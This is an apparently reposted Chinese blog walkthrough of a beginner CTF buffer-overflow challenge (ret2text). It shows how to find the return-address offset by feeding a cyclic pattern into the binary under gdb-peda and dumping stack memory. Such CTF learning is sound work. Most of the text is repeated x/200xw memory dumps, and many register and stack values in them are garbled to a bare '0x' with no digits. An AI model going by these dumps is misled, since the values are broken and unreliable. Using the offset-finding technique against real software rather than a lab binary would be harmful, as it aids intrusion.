pwn，获取系统权限，入门题，cyclic

大家好，我是讯享网，很高兴认识大家。

https://blog.csdn.net/SanOrintea/article/details/

大部分还是按照这个来的，就是关于数前面有多少个字符的时候，这个博客是用cyclic -l来数的，但是我在gdb中运行这个命令的时候显示有错误，

我觉得可能是因为那个博客是pwndbg，我是gdb-peda，所以，我就是列了这200个字符的规律，数了一下，当然按照下面x/200xw这种方法也可以数出来

在ida中

search->text 找到地址

也可以在左边直接找main

ningan@ubuntu:~/anan/test$ ./ret2text
There is something amazing here, do you know anything?

Maybe I will tell you next time !ningan@ubuntu:~/anan/test$
ningan@ubuntu:~/anan/test$

ningan@ubuntu:~/anan/test$ cyclic 200
aaaabaaacaaadaaaeaaafaaagaaahaaaiaaajaaakaaalaaamaaanaaaoaaapaaaqaaaraaasaaataaauaaavaaawaaaxaaayaaazaabbaabcaabdaabeaabfaabgaabhaabiaabjaabkaablaabmaabnaaboaabpaabqaabraabsaabtaabuaabvaabwaabxaabyaab
ningan@ubuntu:~/anan/test$
ningan@ubuntu:~/anan/test$ gdb -q ret2text
Traceback (most recent call last):
File "/home/ningan/pwndbg/gdbinit.py", line 36, in <module>
import pwndbg # isort:skip
File "/home/ningan/pwndbg/pwndbg/__init__.py", line 19, in <module>
import pwndbg.commands.aslr
File "/home/ningan/pwndbg/pwndbg/commands/aslr.py", line 24, in <module>
def aslr(state=None):
File "/home/ningan/pwndbg/pwndbg/commands/__init__.py", line 298, in __call__
return _ArgparsedCommand(self.parser, function)
File "/home/ningan/pwndbg/pwndbg/commands/__init__.py", line 267, in __init__
super(_ArgparsedCommand, self).__init__(function, command_name=command_name, *a, kw)
File "/home/ningan/pwndbg/pwndbg/commands/__init__.py", line 61, in __init__
raise Exception('Cannot override non-whitelisted built-in command "%s"' % command_name)
Exception: Cannot override non-whitelisted built-in command "aslr"
Reading symbols from ret2text...done.
Python Exception <class 'AttributeError'> 'module' object has no attribute 'commands':
gdb-peda$ run
Starting program: /home/ningan/anan/test/ret2text
Python Exception <class 'AttributeError'> 'module' object has no attribute 'commands':
Python Exception <class 'AttributeError'> 'module' object has no attribute 'commands':
Python Exception <class 'AttributeError'> 'module' object has no attribute 'commands':
Python Exception <class 'AttributeError'> 'module' object has no attribute 'commands':
Python Exception <class 'AttributeError'> 'module' object has no attribute 'commands':
Python Exception <class 'AttributeError'> 'module' object has no attribute 'commands':
Python Exception <class 'AttributeError'> 'module' object has no attribute 'commands':
There is something amazing here, do you know anything?
aaaabaaacaaadaaaeaaafaaagaaahaaaiaaajaaakaaalaaamaaanaaaoaaapaaaqaaaraaasaaataaauaaavaaawaaaxaaayaaazaabbaabcaabdaabeaabfaabgaabhaabiaabjaabkaablaabmaabnaaboaabpaabqaabraabsaabtaabuaabvaabwaabxaabyaab
Maybe I will tell you next time !
Program received signal SIGSEGV, Segmentation fault.

[----------------------------------registers-----------------------------------]
EAX: 0x0
EBX: 0xf7fbc000 --> 0x1acda8
ECX: 0x21 ('!')
EDX: 0xf7fbd898 --> 0x0
ESI: 0x0
EDI: 0x0
EBP: 0x ('caab')
ESP: 0xffffd140 ("eaabfaabgaabhaabiaabjaabkaablaabmaabnaaboaabpaabqaabraabsaabtaabuaabvaabwaabxaabyaab")
EIP: 0x ('daab')
EFLAGS: 0x10282 (carry parity adjust zero SIGN trap INTERRUPT direction overflow)
[-------------------------------------code-------------------------------------]
Invalid $PC address: 0x
[------------------------------------stack-------------------------------------]
0000| 0xffffd140 ("eaabfaabgaabhaabiaabjaabkaablaabmaabnaaboaabpaabqaabraabsaabtaabuaabvaabwaabxaabyaab")
0004| 0xffffd144 ("faabgaabhaabiaabjaabkaablaabmaabnaaboaabpaabqaabraabsaabtaabuaabvaabwaabxaabyaab")
0008| 0xffffd148 ("gaabhaabiaabjaabkaablaabmaabnaaboaabpaabqaabraabsaabtaabuaabvaabwaabxaabyaab")
0012| 0xffffd14c ("haabiaabjaabkaablaabmaabnaaboaabpaabqaabraabsaabtaabuaabvaabwaabxaabyaab")
0016| 0xffffd150 ("iaabjaabkaablaabmaabnaaboaabpaabqaabraabsaabtaabuaabvaabwaabxaabyaab")
0020| 0xffffd154 ("jaabkaablaabmaabnaaboaabpaabqaabraabsaabtaabuaabvaabwaabxaabyaab")
0024| 0xffffd158 ("kaablaabmaabnaaboaabpaabqaabraabsaabtaabuaabvaabwaabxaabyaab")
0028| 0xffffd15c ("laabmaabnaaboaabpaabqaabraabsaabtaabuaabvaabwaabxaabyaab")
[------------------------------------------------------------------------------]
Legend: code, data, rodata, value
Stopped reason: SIGSEGV
0x in ?? ()
Python Exception <class 'AttributeError'> 'module' object has no attribute 'commands':
gdb-peda$ x/200xw 0xffffd140
0xffffd140:   0x   0x   0x   0x
0xffffd150:   0x   0xa   0xb   0xc
0xffffd160:   0xd   0xe   0xf   0x
0xffffd170:   0x   0x   0x   0x
0xffffd180:   0x   0x   0x   0x
0xffffd190:   0x   0xf7ff0600   0xf7e28a09   0xf7ffd000
0xffffd1a0:   0x00000001   0x0   0x00000000   0x0
0xffffd1b0:   0x0   0x00000001   0xffffd1d4   0x080486d0
0xffffd1c0:   0x0   0xf7feb300   0xffffd1cc   0x0000001c
0xffffd1d0:   0x00000001   0xffffd392   0x00000000   0xffffd3b2
0xffffd1e0:   0xffffd3bd   0xffffd3cf   0xffffd401   0xffffd412
0xffffd1f0:   0xffffd428   0xffffd45d   0xffffd46e   0xffffd47e
0xffffd200:   0xffffd489   0xffffd49b   0xffffd4cf   0xffffd513
0xffffd210:   0xffffd542   0xffffd54e   0xffffda6f   0xffffdaa9
0xffffd220:   0xffffdadd   0xffffdb0d   0xffffdb40   0xffffdb4c
0xffffd230:   0xffffdb90   0xffffdba7   0xffffdc05   0xffffdc14
0xffffd240:   0xffffdc35   0xffffdc47   0xffffdc62   0xffffdc74
0xffffd250:   0xffffdc88   0xffffdc99   0xffffdcb0   0xffffdce6
0xffffd260:   0xffffdcf5   0xffffdd12   0xffffdd24   0xffffdd2d
0xffffd270:   0xffffdd3f   0xffffdd59   0xffffdd61   0xffffdd70
0xffffd280:   0xffffdd82   0xffffdd91   0xffffddbd   0xffffddcf
0xffffd290:   0xffffddde   0xffffddfe   0xffffde3a   0xffffde89
0xffffd2a0:   0xffffde9b   0xffffdebb   0xffffded0   0xffffdef2
0xffffd2b0:   0xffffdf01   0xffffdf0c   0xffffdf2b   0xffffdf3e
0xffffd2c0:   0xffffdf58   0xffffdf7a   0xffffdf9b   0xffffdfbf
0xffffd2d0:   0x00000000   0x00000020   0xf7fdacd0   0x00000021
0xffffd2e0:   0xf7fda000   0x00000010   0x078bfbff   0x00000006
0xffffd2f0:   0x00001000   0x00000011   0x00000064   0x00000003
0xffffd300:   0x0   0x00000004   0x00000020   0x00000005
0xffffd310:   0x00000009   0x00000007   0xf7fdc000   0x00000008
0xffffd320:   0x00000000   0x00000009   0x0   0x0000000b
0xffffd330:   0x000003e8   0x0000000c   0x000003e8   0x0000000d
0xffffd340:   0x000003e8   0x0000000e   0x000003e8   0x00000017
0xffffd350:   0x00000000   0x00000019   0xffffd37b   0x0000001f
0xffffd360:   0xffffdfd8   0x0000000f   0xffffd38b   0x00000000
0xffffd370:   0x00000000   0x00000000   0x   0x2235c85a
0xffffd380:   0x26079adc   0xd3edc5de   0x69c74ecd   0x00
0xffffd390:   0x682f0000   0x2f656d6f   0x676e696e   0x612f6e61
0xffffd3a0:   0x2f6e616e   0x   0xf   0x
0xffffd3b0:   0x   0x54565f47   0x373d524e   0x
0xffffd3c0:   0xf   0x4e4f4953   0x3d44495f   0x
0xffffd3d0:   0x475f4744   0x   0x445f5245   0x5f
0xffffd3e0:   0x3d   0xf   0x62696c2f   0x67696c2f
0xffffd3f0:   0x6d   0xd   0x696e2f61   0x6e61676e
0xffffd400:   0x4c   0x58554e49   0x494e495f   0x45593d54
0xffffd410:   0x4c   0x   0x4d495f52   0x444f4d5f
0xffffd420:   0x3d454c55   0x006d6978   0x5f   0x4e
0xffffd430:   0x4e495f54   0x2f3d4f46   0x2f6e7572   0x
0xffffd440:   0xf   0x656b2f30   0x6e   0x6a4d2d67
0xffffd450:   0x   0xf   0x313a303a   0x
gdb-peda$ x/200xw 0xffffd120
0xffffd120:   0x   0x   0x   0x
0xffffd130:   0xa   0x   0x   0x
0xffffd140:   0x   0x   0x   0x
0xffffd150:   0x   0xa   0xb   0xc
0xffffd160:   0xd   0xe   0xf   0x
0xffffd170:   0x   0x   0x   0x
0xffffd180:   0x   0x   0x   0x
0xffffd190:   0x   0xf7ff0600   0xf7e28a09   0xf7ffd000
0xffffd1a0:   0x00000001   0x0   0x00000000   0x0
0xffffd1b0:   0x0   0x00000001   0xffffd1d4   0x080486d0
0xffffd1c0:   0x0   0xf7feb300   0xffffd1cc   0x0000001c
0xffffd1d0:   0x00000001   0xffffd392   0x00000000   0xffffd3b2
0xffffd1e0:   0xffffd3bd   0xffffd3cf   0xffffd401   0xffffd412
0xffffd1f0:   0xffffd428   0xffffd45d   0xffffd46e   0xffffd47e
0xffffd200:   0xffffd489   0xffffd49b   0xffffd4cf   0xffffd513
0xffffd210:   0xffffd542   0xffffd54e   0xffffda6f   0xffffdaa9
0xffffd220:   0xffffdadd   0xffffdb0d   0xffffdb40   0xffffdb4c
0xffffd230:   0xffffdb90   0xffffdba7   0xffffdc05   0xffffdc14
0xffffd240:   0xffffdc35   0xffffdc47   0xffffdc62   0xffffdc74
0xffffd250:   0xffffdc88   0xffffdc99   0xffffdcb0   0xffffdce6
0xffffd260:   0xffffdcf5   0xffffdd12   0xffffdd24   0xffffdd2d
0xffffd270:   0xffffdd3f   0xffffdd59   0xffffdd61   0xffffdd70
0xffffd280:   0xffffdd82   0xffffdd91   0xffffddbd   0xffffddcf
0xffffd290:   0xffffddde   0xffffddfe   0xffffde3a   0xffffde89
0xffffd2a0:   0xffffde9b   0xffffdebb   0xffffded0   0xffffdef2
0xffffd2b0:   0xffffdf01   0xffffdf0c   0xffffdf2b   0xffffdf3e
0xffffd2c0:   0xffffdf58   0xffffdf7a   0xffffdf9b   0xffffdfbf
0xffffd2d0:   0x00000000   0x00000020   0xf7fdacd0   0x00000021
0xffffd2e0:   0xf7fda000   0x00000010   0x078bfbff   0x00000006
0xffffd2f0:   0x00001000   0x00000011   0x00000064   0x00000003
0xffffd300:   0x0   0x00000004   0x00000020   0x00000005
0xffffd310:   0x00000009   0x00000007   0xf7fdc000   0x00000008
0xffffd320:   0x00000000   0x00000009   0x0   0x0000000b
0xffffd330:   0x000003e8   0x0000000c   0x000003e8   0x0000000d
0xffffd340:   0x000003e8   0x0000000e   0x000003e8   0x00000017
0xffffd350:   0x00000000   0x00000019   0xffffd37b   0x0000001f
0xffffd360:   0xffffdfd8   0x0000000f   0xffffd38b   0x00000000
0xffffd370:   0x00000000   0x00000000   0x   0x2235c85a
0xffffd380:   0x26079adc   0xd3edc5de   0x69c74ecd   0x00
0xffffd390:   0x682f0000   0x2f656d6f   0x676e696e   0x612f6e61
0xffffd3a0:   0x2f6e616e   0x   0xf   0x
0xffffd3b0:   0x   0x54565f47   0x373d524e   0x
0xffffd3c0:   0xf   0x4e4f4953   0x3d44495f   0x
0xffffd3d0:   0x475f4744   0x   0x445f5245   0x5f
0xffffd3e0:   0x3d   0xf   0x62696c2f   0x67696c2f
0xffffd3f0:   0x6d   0xd   0x696e2f61   0x6e61676e
0xffffd400:   0x4c   0x58554e49   0x494e495f   0x45593d54
0xffffd410:   0x4c   0x   0x4d495f52   0x444f4d5f
0xffffd420:   0x3d454c55   0x006d6978   0x5f   0x4e
0xffffd430:   0x4e495f54   0x2f3d4f46   0x2f6e7572   0x
gdb-peda$ p *0xffffd13c
$1 = 0x
gdb-peda$ x/200xw 0xffffd100
0xffffd100:   0xe   0xf   0x   0x
0xffffd110:   0x   0x   0x   0x
0xffffd120:   0x   0x   0x   0x
0xffffd130:   0xa   0x   0x   0x
0xffffd140:   0x   0x   0x   0x
0xffffd150:   0x   0xa   0xb   0xc
0xffffd160:   0xd   0xe   0xf   0x
0xffffd170:   0x   0x   0x   0x
0xffffd180:   0x   0x   0x   0x
0xffffd190:   0x   0xf7ff0600   0xf7e28a09   0xf7ffd000
0xffffd1a0:   0x00000001   0x0   0x00000000   0x0
0xffffd1b0:   0x0   0x00000001   0xffffd1d4   0x080486d0
0xffffd1c0:   0x0   0xf7feb300   0xffffd1cc   0x0000001c
0xffffd1d0:   0x00000001   0xffffd392   0x00000000   0xffffd3b2
0xffffd1e0:   0xffffd3bd   0xffffd3cf   0xffffd401   0xffffd412
0xffffd1f0:   0xffffd428   0xffffd45d   0xffffd46e   0xffffd47e
0xffffd200:   0xffffd489   0xffffd49b   0xffffd4cf   0xffffd513
0xffffd210:   0xffffd542   0xffffd54e   0xffffda6f   0xffffdaa9
0xffffd220:   0xffffdadd   0xffffdb0d   0xffffdb40   0xffffdb4c
0xffffd230:   0xffffdb90   0xffffdba7   0xffffdc05   0xffffdc14
0xffffd240:   0xffffdc35   0xffffdc47   0xffffdc62   0xffffdc74
0xffffd250:   0xffffdc88   0xffffdc99   0xffffdcb0   0xffffdce6
0xffffd260:   0xffffdcf5   0xffffdd12   0xffffdd24   0xffffdd2d
0xffffd270:   0xffffdd3f   0xffffdd59   0xffffdd61   0xffffdd70
0xffffd280:   0xffffdd82   0xffffdd91   0xffffddbd   0xffffddcf
0xffffd290:   0xffffddde   0xffffddfe   0xffffde3a   0xffffde89
0xffffd2a0:   0xffffde9b   0xffffdebb   0xffffded0   0xffffdef2
0xffffd2b0:   0xffffdf01   0xffffdf0c   0xffffdf2b   0xffffdf3e
0xffffd2c0:   0xffffdf58   0xffffdf7a   0xffffdf9b   0xffffdfbf
0xffffd2d0:   0x00000000   0x00000020   0xf7fdacd0   0x00000021
0xffffd2e0:   0xf7fda000   0x00000010   0x078bfbff   0x00000006
0xffffd2f0:   0x00001000   0x00000011   0x00000064   0x00000003
0xffffd300:   0x0   0x00000004   0x00000020   0x00000005
0xffffd310:   0x00000009   0x00000007   0xf7fdc000   0x00000008
0xffffd320:   0x00000000   0x00000009   0x0   0x0000000b
0xffffd330:   0x000003e8   0x0000000c   0x000003e8   0x0000000d
0xffffd340:   0x000003e8   0x0000000e   0x000003e8   0x00000017
0xffffd350:   0x00000000   0x00000019   0xffffd37b   0x0000001f
0xffffd360:   0xffffdfd8   0x0000000f   0xffffd38b   0x00000000
0xffffd370:   0x00000000   0x00000000   0x   0x2235c85a
0xffffd380:   0x26079adc   0xd3edc5de   0x69c74ecd   0x00
0xffffd390:   0x682f0000   0x2f656d6f   0x676e696e   0x612f6e61
0xffffd3a0:   0x2f6e616e   0x   0xf   0x
0xffffd3b0:   0x   0x54565f47   0x373d524e   0x
0xffffd3c0:   0xf   0x4e4f4953   0x3d44495f   0x
0xffffd3d0:   0x475f4744   0x   0x445f5245   0x5f
0xffffd3e0:   0x3d   0xf   0x62696c2f   0x67696c2f
0xffffd3f0:   0x6d   0xd   0x696e2f61   0x6e61676e
0xffffd400:   0x4c   0x58554e49   0x494e495f   0x45593d54
0xffffd410:   0x4c   0x   0x4d495f52   0x444f4d5f
gdb-peda$ x/200xw 0xffffd0f0
0xffffd0f0:   0xa   0xb   0xc   0xd
0xffffd100:   0xe   0xf   0x   0x
0xffffd110:   0x   0x   0x   0x
0xffffd120:   0x   0x   0x   0x
0xffffd130:   0xa   0x   0x   0x
0xffffd140:   0x   0x   0x   0x
0xffffd150:   0x   0xa   0xb   0xc
0xffffd160:   0xd   0xe   0xf   0x
0xffffd170:   0x   0x   0x   0x
0xffffd180:   0x   0x   0x   0x
0xffffd190:   0x   0xf7ff0600   0xf7e28a09   0xf7ffd000
0xffffd1a0:   0x00000001   0x0   0x00000000   0x0
0xffffd1b0:   0x0   0x00000001   0xffffd1d4   0x080486d0
0xffffd1c0:   0x0   0xf7feb300   0xffffd1cc   0x0000001c
0xffffd1d0:   0x00000001   0xffffd392   0x00000000   0xffffd3b2
0xffffd1e0:   0xffffd3bd   0xffffd3cf   0xffffd401   0xffffd412
0xffffd1f0:   0xffffd428   0xffffd45d   0xffffd46e   0xffffd47e
0xffffd200:   0xffffd489   0xffffd49b   0xffffd4cf   0xffffd513
0xffffd210:   0xffffd542   0xffffd54e   0xffffda6f   0xffffdaa9
0xffffd220:   0xffffdadd   0xffffdb0d   0xffffdb40   0xffffdb4c
0xffffd230:   0xffffdb90   0xffffdba7   0xffffdc05   0xffffdc14
0xffffd240:   0xffffdc35   0xffffdc47   0xffffdc62   0xffffdc74
0xffffd250:   0xffffdc88   0xffffdc99   0xffffdcb0   0xffffdce6
0xffffd260:   0xffffdcf5   0xffffdd12   0xffffdd24   0xffffdd2d
0xffffd270:   0xffffdd3f   0xffffdd59   0xffffdd61   0xffffdd70
0xffffd280:   0xffffdd82   0xffffdd91   0xffffddbd   0xffffddcf
0xffffd290:   0xffffddde   0xffffddfe   0xffffde3a   0xffffde89
0xffffd2a0:   0xffffde9b   0xffffdebb   0xffffded0   0xffffdef2
0xffffd2b0:   0xffffdf01   0xffffdf0c   0xffffdf2b   0xffffdf3e
0xffffd2c0:   0xffffdf58   0xffffdf7a   0xffffdf9b   0xffffdfbf
0xffffd2d0:   0x00000000   0x00000020   0xf7fdacd0   0x00000021
0xffffd2e0:   0xf7fda000   0x00000010   0x078bfbff   0x00000006
0xffffd2f0:   0x00001000   0x00000011   0x00000064   0x00000003
0xffffd300:   0x0   0x00000004   0x00000020   0x00000005
0xffffd310:   0x00000009   0x00000007   0xf7fdc000   0x00000008
0xffffd320:   0x00000000   0x00000009   0x0   0x0000000b
0xffffd330:   0x000003e8   0x0000000c   0x000003e8   0x0000000d
0xffffd340:   0x000003e8   0x0000000e   0x000003e8   0x00000017
0xffffd350:   0x00000000   0x00000019   0xffffd37b   0x0000001f
0xffffd360:   0xffffdfd8   0x0000000f   0xffffd38b   0x00000000
0xffffd370:   0x00000000   0x00000000   0x   0x2235c85a
0xffffd380:   0x26079adc   0xd3edc5de   0x69c74ecd   0x00
0xffffd390:   0x682f0000   0x2f656d6f   0x676e696e   0x612f6e61
0xffffd3a0:   0x2f6e616e   0x   0xf   0x
0xffffd3b0:   0x   0x54565f47   0x373d524e   0x
0xffffd3c0:   0xf   0x4e4f4953   0x3d44495f   0x
0xffffd3d0:   0x475f4744   0x   0x445f5245   0x5f
0xffffd3e0:   0x3d   0xf   0x62696c2f   0x67696c2f
0xffffd3f0:   0x6d   0xd   0x696e2f61   0x6e61676e
0xffffd400:   0x4c   0x58554e49   0x494e495f   0x45593d54
gdb-peda$ x/200xw 0xffffd0d0
0xffffd0d0:   0x   0x   0x   0x
0xffffd0e0:   0x   0x   0x   0x
0xffffd0f0:   0xa   0xb   0xc   0xd
0xffffd100:   0xe   0xf   0x   0x
0xffffd110:   0x   0x   0x   0x
0xffffd120:   0x   0x   0x   0x
0xffffd130:   0xa   0x   0x   0x
0xffffd140:   0x   0x   0x   0x
0xffffd150:   0x   0xa   0xb   0xc
0xffffd160:   0xd   0xe   0xf   0x
0xffffd170:   0x   0x   0x   0x
0xffffd180:   0x   0x   0x   0x
0xffffd190:   0x   0xf7ff0600   0xf7e28a09   0xf7ffd000
0xffffd1a0:   0x00000001   0x0   0x00000000   0x0
0xffffd1b0:   0x0   0x00000001   0xffffd1d4   0x080486d0
0xffffd1c0:   0x0   0xf7feb300   0xffffd1cc   0x0000001c
0xffffd1d0:   0x00000001   0xffffd392   0x00000000   0xffffd3b2
0xffffd1e0:   0xffffd3bd   0xffffd3cf   0xffffd401   0xffffd412
0xffffd1f0:   0xffffd428   0xffffd45d   0xffffd46e   0xffffd47e
0xffffd200:   0xffffd489   0xffffd49b   0xffffd4cf   0xffffd513
0xffffd210:   0xffffd542   0xffffd54e   0xffffda6f   0xffffdaa9
0xffffd220:   0xffffdadd   0xffffdb0d   0xffffdb40   0xffffdb4c
0xffffd230:   0xffffdb90   0xffffdba7   0xffffdc05   0xffffdc14
0xffffd240:   0xffffdc35   0xffffdc47   0xffffdc62   0xffffdc74
0xffffd250:   0xffffdc88   0xffffdc99   0xffffdcb0   0xffffdce6
0xffffd260:   0xffffdcf5   0xffffdd12   0xffffdd24   0xffffdd2d
0xffffd270:   0xffffdd3f   0xffffdd59   0xffffdd61   0xffffdd70
0xffffd280:   0xffffdd82   0xffffdd91   0xffffddbd   0xffffddcf
0xffffd290:   0xffffddde   0xffffddfe   0xffffde3a   0xffffde89
0xffffd2a0:   0xffffde9b   0xffffdebb   0xffffded0   0xffffdef2
0xffffd2b0:   0xffffdf01   0xffffdf0c   0xffffdf2b   0xffffdf3e
0xffffd2c0:   0xffffdf58   0xffffdf7a   0xffffdf9b   0xffffdfbf
0xffffd2d0:   0x00000000   0x00000020   0xf7fdacd0   0x00000021
0xffffd2e0:   0xf7fda000   0x00000010   0x078bfbff   0x00000006
0xffffd2f0:   0x00001000   0x00000011   0x00000064   0x00000003
0xffffd300:   0x0   0x00000004   0x00000020   0x00000005
0xffffd310:   0x00000009   0x00000007   0xf7fdc000   0x00000008
0xffffd320:   0x00000000   0x00000009   0x0   0x0000000b
0xffffd330:   0x000003e8   0x0000000c   0x000003e8   0x0000000d
0xffffd340:   0x000003e8   0x0000000e   0x000003e8   0x00000017
0xffffd350:   0x00000000   0x00000019   0xffffd37b   0x0000001f
0xffffd360:   0xffffdfd8   0x0000000f   0xffffd38b   0x00000000
0xffffd370:   0x00000000   0x00000000   0x   0x2235c85a
0xffffd380:   0x26079adc   0xd3edc5de   0x69c74ecd   0x00
0xffffd390:   0x682f0000   0x2f656d6f   0x676e696e   0x612f6e61
0xffffd3a0:   0x2f6e616e   0x   0xf   0x
0xffffd3b0:   0x   0x54565f47   0x373d524e   0x
0xffffd3c0:   0xf   0x4e4f4953   0x3d44495f   0x
0xffffd3d0:   0x475f4744   0x   0x445f5245   0x5f
0xffffd3e0:   0x3d   0xf   0x62696c2f   0x67696c2f
gdb-peda$ x/200xw 0xffffd0c0
0xffffd0c0:   0xffffd174   0xffffd0e8   0xffffd0e0   0x
0xffffd0d0:   0x   0x   0x   0x
0xffffd0e0:   0x   0x   0x   0x
0xffffd0f0:   0xa   0xb   0xc   0xd
0xffffd100:   0xe   0xf   0x   0x
0xffffd110:   0x   0x   0x   0x
0xffffd120:   0x   0x   0x   0x
0xffffd130:   0xa   0x   0x   0x
0xffffd140:   0x   0x   0x   0x
0xffffd150:   0x   0xa   0xb   0xc
0xffffd160:   0xd   0xe   0xf   0x
0xffffd170:   0x   0x   0x   0x
0xffffd180:   0x   0x   0x   0x
0xffffd190:   0x   0xf7ff0600   0xf7e28a09   0xf7ffd000
0xffffd1a0:   0x00000001   0x0   0x00000000   0x0
0xffffd1b0:   0x0   0x00000001   0xffffd1d4   0x080486d0
0xffffd1c0:   0x0   0xf7feb300   0xffffd1cc   0x0000001c
0xffffd1d0:   0x00000001   0xffffd392   0x00000000   0xffffd3b2
0xffffd1e0:   0xffffd3bd   0xffffd3cf   0xffffd401   0xffffd412
0xffffd1f0:   0xffffd428   0xffffd45d   0xffffd46e   0xffffd47e
0xffffd200:   0xffffd489   0xffffd49b   0xffffd4cf   0xffffd513
0xffffd210:   0xffffd542   0xffffd54e   0xffffda6f   0xffffdaa9
0xffffd220:   0xffffdadd   0xffffdb0d   0xffffdb40   0xffffdb4c
0xffffd230:   0xffffdb90   0xffffdba7   0xffffdc05   0xffffdc14
0xffffd240:   0xffffdc35   0xffffdc47   0xffffdc62   0xffffdc74
0xffffd250:   0xffffdc88   0xffffdc99   0xffffdcb0   0xffffdce6
0xffffd260:   0xffffdcf5   0xffffdd12   0xffffdd24   0xffffdd2d
0xffffd270:   0xffffdd3f   0xffffdd59   0xffffdd61   0xffffdd70
0xffffd280:   0xffffdd82   0xffffdd91   0xffffddbd   0xffffddcf
0xffffd290:   0xffffddde   0xffffddfe   0xffffde3a   0xffffde89
0xffffd2a0:   0xffffde9b   0xffffdebb   0xffffded0   0xffffdef2
0xffffd2b0:   0xffffdf01   0xffffdf0c   0xffffdf2b   0xffffdf3e
0xffffd2c0:   0xffffdf58   0xffffdf7a   0xffffdf9b   0xffffdfbf
0xffffd2d0:   0x00000000   0x00000020   0xf7fdacd0   0x00000021
0xffffd2e0:   0xf7fda000   0x00000010   0x078bfbff   0x00000006
0xffffd2f0:   0x00001000   0x00000011   0x00000064   0x00000003
0xffffd300:   0x0   0x00000004   0x00000020   0x00000005
0xffffd310:   0x00000009   0x00000007   0xf7fdc000   0x00000008
0xffffd320:   0x00000000   0x00000009   0x0   0x0000000b
0xffffd330:   0x000003e8   0x0000000c   0x000003e8   0x0000000d
0xffffd340:   0x000003e8   0x0000000e   0x000003e8   0x00000017
0xffffd350:   0x00000000   0x00000019   0xffffd37b   0x0000001f
0xffffd360:   0xffffdfd8   0x0000000f   0xffffd38b   0x00000000
0xffffd370:   0x00000000   0x00000000   0x   0x2235c85a
0xffffd380:   0x26079adc   0xd3edc5de   0x69c74ecd   0x00
0xffffd390:   0x682f0000   0x2f656d6f   0x676e696e   0x612f6e61
0xffffd3a0:   0x2f6e616e   0x   0xf   0x
0xffffd3b0:   0x   0x54565f47   0x373d524e   0x
0xffffd3c0:   0xf   0x4e4f4953   0x3d44495f   0x
0xffffd3d0:   0x475f4744   0x   0x445f5245   0x5f
gdb-peda$
0xffffd3e0:   0x3d   0xf   0x62696c2f   0x67696c2f
0xffffd3f0:   0x6d   0xd   0x696e2f61   0x6e61676e
0xffffd400:   0x4c   0x58554e49   0x494e495f   0x45593d54
0xffffd410:   0x4c   0x   0x4d495f52   0x444f4d5f
0xffffd420:   0x3d454c55   0x006d6978   0x5f   0x4e
0xffffd430:   0x4e495f54   0x2f3d4f46   0x2f6e7572   0x
0xffffd440:   0xf   0x656b2f30   0x6e   0x6a4d2d67
0xffffd450:   0x   0xf   0x313a303a   0x
0xffffd460:   0xf   0x4e4f4953   0xd   0x
0xffffd470:   0x3d4c4c45   0x6e69622f   0xf   0x
0xffffd480:   0x783d4d52   0x6d   0x4e   0x49574f44
0xffffd490:   0x30363d44   0x   0x   0x454d4f4e
0xffffd4a0:   0x59454b5f   0x474e4952   0x4e4f435f   0x4c4f5254
0xffffd4b0:   0x75722f3d   0x73752f6e   0x312f7265   0x2f
0xffffd4c0:   0xb   0x2d676e69   0x73476a4d   0x
0xffffd4d0:   0x   0x535f5452   0x   0x753d4e4f
0xffffd4e0:   0x3a78696e   0x   0x   0x6f632f3d
0xffffd4f0:   0x62752f6d   0x75746e75   0xf   0x
0xffffd500:   0xd   0x6e6f6973   0xf   0x31322f30
0xffffd510:   0x   0x4d5f4b54   0x4c55444f   0x6f3d5345
0xffffd520:   0x6c   0x732d7961   0x6c6f7263   0xc
0xffffd530:   0x696e753a   0x672d7974   0x6d2d6b74   0x6c75646f
0xffffd540:   0x   0x6e3d5245   0x61676e69   0x534c006e
0xffffd550:   0x4c4f435f   0x3d53524f   0x303d7372   0x3d69643a
0xffffd560:   0x333b3130   0x6e6c3a34   0x3b31303d   0x6d3a3633
0xffffd570:   0x30303d68   0x3d69703a   0x333b3034   0x6f733a33
0xffffd580:   0x3b31303d   0x643a3533   0x31303d6f   0x3a35333b
0xffffd590:   0x343d6462   0x33333b30   0x3a31303b   0x343d6463
0xffffd5a0:   0x33333b30   0x3a31303b   0x343d726f   0x31333b30
0xffffd5b0:   0x3a31303b   0x333d7573   0x31343b37   0x3d67733a
0xffffd5c0:   0x343b3033   0x61633a33   0x3b30333d   0x743a3134
0xffffd5d0:   0x30333d77   0x3a32343b   0x333d776f   0x32343b34
0xffffd5e0:   0x3d74733a   0x343b3733   0x78653a34   0x3b31303d
0xffffd5f0:   0x2a3a3233   0xe   0x3b31303d   0x2a3a3133
0xffffd600:   0x7a67742e   0x3b31303d   0x2a3a3133   0x6a72612e
0xffffd610:   0x3b31303d   0x2a3a3133   0x7a61742e   0x3b31303d
0xffffd620:   0x2a3a3133   0x687a6c2e   0x3b31303d   0x2a3a3133
0xffffd630:   0x6d7a6c2e   0x31303d61   0x3a31333b   0x6c742e2a
0xffffd640:   0x31303d7a   0x3a31333b   0x78742e2a   0x31303d7a
0xffffd650:   0x3a31333b   0x697a2e2a   0x31303d70   0x3a31333b
0xffffd660:   0x3d7a2e2a   0x333b3130   0x2e2a3a31   0x31303d5a
0xffffd670:   0x3a31333b   0x7a642e2a   0x3b31303d   0x2a3a3133
0xffffd680:   0x3d7a672e   0x333b3130   0x2e2a3a31   0x303d7a6c
0xffffd690:   0x31333b31   0x782e2a3a   0x31303d7a   0x3a31333b
0xffffd6a0:   0x7a622e2a   0x31303d32   0x3a31333b   0x7a622e2a
0xffffd6b0:   0x3b31303d   0x2a3a3133   0x7a62742e   0x3b31303d
0xffffd6c0:   0x2a3a3133   0x7a62742e   0x31303d32   0x3a31333b
0xffffd6d0:   0x7a742e2a   0x3b31303d   0x2a3a3133   0xe
0xffffd6e0:   0x3b31303d   0x2a3a3133   0x6d70722e   0x3b31303d
0xffffd6f0:   0x2a3a3133   0x72616a2e   0x3b31303d   0x2a3a3133
gdb-peda$
0xffffd700:   0xe   0x3b31303d   0x2a3a3133   0xe
0xffffd710:   0x3b31303d   0x2a3a3133   0xe   0x3b31303d
0xffffd720:   0x2a3a3133   0xe   0x3b31303d   0x2a3a3133
0xffffd730:   0xe   0x3b31303d   0x2a3a3133   0x6f6f7a2e
0xffffd740:   0x3b31303d   0x2a3a3133   0xe   0x31303d6f
0xffffd750:   0x3a31333b   0x7a372e2a   0x3b31303d   0x2a3a3133
0xffffd760:   0x3d7a722e   0x333b3130   0x2e2a3a31   0x3d67706a
0xffffd770:   0x333b3130   0x2e2a3a35   0xa   0x3b31303d
0xffffd780:   0x2a3a3533   0xe   0x3b31303d   0x2a3a3533
